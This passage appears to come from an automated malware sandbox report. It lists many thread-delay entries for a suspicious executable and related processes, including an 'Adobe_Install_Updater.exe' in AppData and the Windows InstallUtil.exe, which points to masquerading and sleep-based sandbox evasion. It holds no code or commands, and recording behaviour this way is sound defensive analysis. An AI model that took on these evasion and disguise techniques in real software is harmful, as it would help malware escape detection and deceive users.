Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 99271 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 99156 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 99047 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 98937 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 98828 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 98719 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 98594 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 98484 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 98375 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 98240 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 98125 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 98015 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 97897 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 97795 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 97687 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 97578 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 97461 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 97359 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 97250 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 97119 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 97016 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 96906 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 96797 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 96688 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 96563 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 96438 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 96313 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 96203 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 96092 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 95984 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99869 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99764 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99546 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99437 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99107 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98777 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98343 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98124 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98009 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97343 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97015 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96796 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96687 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96578 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96440 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96298 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96171 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96062 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95953 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95843 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95734 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95625 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95515 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95296 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95187 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95078 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94968 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94859 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99797
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99671
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99545
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99437
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99327
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99217
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99107
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99000
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98781
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98671
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98562
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98452
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98336
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98150
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97750
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97605
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97499
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97389
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97281
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97171
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97062
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 96953
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 96842
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 96734
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 96625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99871
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99745
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97442
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96406
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99828
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99718
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99609
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99500
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99390
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99281
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99168
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 99061
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98927
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98666
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98562
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98453
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98327
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98218
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 98109
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97999
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97890
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97779
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97672
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97555
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97453
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97340
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97234
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97125
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 97015
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 96906
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 96796
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 96687
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 96577
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 96468
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Thread delayed: delay time: 96359
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 99797
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 99666
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 99557
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 99443
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 99323
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 98770
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 98625
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 98516
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 98391
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 98266
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 98147
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 98031
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 97918
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 97808
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 97663
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 97527
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 97414
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 97297
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 97188
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 97077
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 96969
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 96860
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 96735
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 96610
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 96218
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 96106
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 96000
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 95891
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 95781
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 95672
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 95563
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 95453
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 95344
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 95219
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 95110
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 94985
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 94860
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 94735
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 94610
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 94485
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Thread delayed: delay time: 94360
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99813
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99559
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99233
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98374
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98262
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97391
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96366
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96247
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99843
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99730
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99623
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99515
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99406
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99296
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99164
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99015
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98763
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98656
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98547
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98437
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98328
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98218
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98109
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98000
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97890
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97781
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97671
